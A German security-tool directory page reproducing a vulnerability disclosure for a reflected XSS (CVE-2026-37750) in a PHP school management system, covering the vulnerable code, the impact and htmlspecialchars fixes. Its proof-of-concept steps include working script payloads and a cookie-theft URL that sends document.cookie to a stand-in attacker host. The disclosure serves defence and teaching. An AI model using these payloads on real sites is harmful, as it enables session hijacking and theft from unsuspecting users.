Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-37750 — Reflektierter XSS-Proof-of-Concept für School Management System 1.0, der die nicht authentifizierte Ausführung von JavaScript über den Typ-Parameter in register.php demonstriert, einschließlich Auswirkungsanalyse und Anleitung zur Behebung. | Kitploit
Tools/GitHubGitHub/menevarad007/cve-2026-37750
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitLernen & Bildung
GitHubmenevarad007/cve-2026-37750

CVE-2026-37750

Reflektierter XSS-Proof-of-Concept für School Management System 1.0, der die nicht authentifizierte Ausführung von JavaScript über den Typ-Parameter in register.php demonstriert, einschließlich Auswirkungsanalyse und Anleitung zur Behebung.

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-37750 — School Management System 1.0 - Reflected XSS

Details

FeldInfo
CVE-IDCVE-2026-37750
TypReflected Cross-Site Scripting (XSS)
SchweregradMittel (CVSSv3: 6.1)
Anbietermahmoudai1
ProduktSchool Management System
Version1.0
EntdeckerVarad AP Mene
Datum2026-04-16
CWECWE-79

Beschreibung

Eine Reflected Cross-Site Scripting (XSS)-Schwachstelle in School Management System 1.0 von mahmoudai1 ermöglicht es nicht authentifizierten Remote-Angreifern, beliebiges JavaScript in den Browsern der Opfer auszuführen, und zwar über den nicht bereinigten type-Parameter in register.php. Der Parameter wird ohne Escape-Behandlung innerhalb eines h1-Tags in Zeile 22 und innerhalb eines form-action-Attributs in Zeile 26 reflektiert. Für die Ausnutzung dieser Schwachstelle ist keine Authentifizierung erforderlich.

CVE-ID: CVE-2026-37750 CWE: CWE-79 CVSSv3: 6.1 Mittel (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)


Produktbeschreibung

School Management System 1.0 ist eine PHP/MySQL-Webanwendung von mahmoudai1 auf GitHub, die zur Verwaltung von Schülern, Lehrern und Eltern in Schulen verwendet wird.

Anbieter-URL: https://github.com/mahmoudai1/school-management-system


Verwundbare Datei

register.php — Registrierungsformular (keine Authentifizierung erforderlich)


Verwundbarer Code

Zeile 22: echo ucfirst($_REQUEST['type'])

Zeile 26: echo $_REQUEST['type']

Kein htmlspecialchars() verwendet — rohe Benutzereingabe wird direkt in HTML reflektiert.


Proof of Concept

Voraussetzungen:

  • Keine Authentifizierung erforderlich
  • Das Ziel muss School Management System 1.0 ausführen

Schritt 1 — Browser öffnen und diese URL aufrufen: http://target/register.php?type=script-alert-document.cookie-/script

Schritt 2 — JavaScript wird im Browser ausgeführt Ergebnis: Ein Alert-Fenster erscheint und zeigt die Session-Cookies.

Schritt 3 — Cookie-Diebstahl-Payload: http://target/register.php?type=script-document.location-http://attacker.com/steal?c=-document.cookie-/script Schritt 4 — Form-action-Injektions-Payload: http://target/register.php?type="-script-alert(1)-/script

Zwei Injektionspunkte bestätigt:

Injektionspunkt 1 — Innerhalb des h1-Tags (Zeile 22):

root@kitploit:~
echo ucfirst($_REQUEST['type'])

Ausgabe:

root@kitploit:~
<h1><script>alert(1)</script> Application</h1>

Injektionspunkt 2 — Innerhalb des form-action-Attributs (Zeile 26):

root@kitploit:~
echo $_REQUEST['type']

Ausgabe:

root@kitploit:~
<form action="register.php?type=<script>alert(1)</script>">

Auswirkungen

  • Session-Hijacking durch Cookie-Diebstahl
  • Phishing — Einfügen gefälschter Login-Formulare
  • Malware-Verteilung über Weiterleitungen
  • Keine Authentifizierung erforderlich

Behebung

Fix für Zeile 22: echo htmlspecialchars(ucfirst($_REQUEST['type']), ENT_QUOTES, 'UTF-8');

Fix für Zeile 26: echo htmlspecialchars($_REQUEST['type'], ENT_QUOTES, 'UTF-8');


Referenzen

  • https://github.com/mahmoudai1/school-management-system
  • https://github.com/mahmoudai1/school-management-system/blob/main/register.php

Entdecker

Varad AP Mene E-Mail: [email protected] GitHub: https://github.com/menevarad007

Tool herunterladen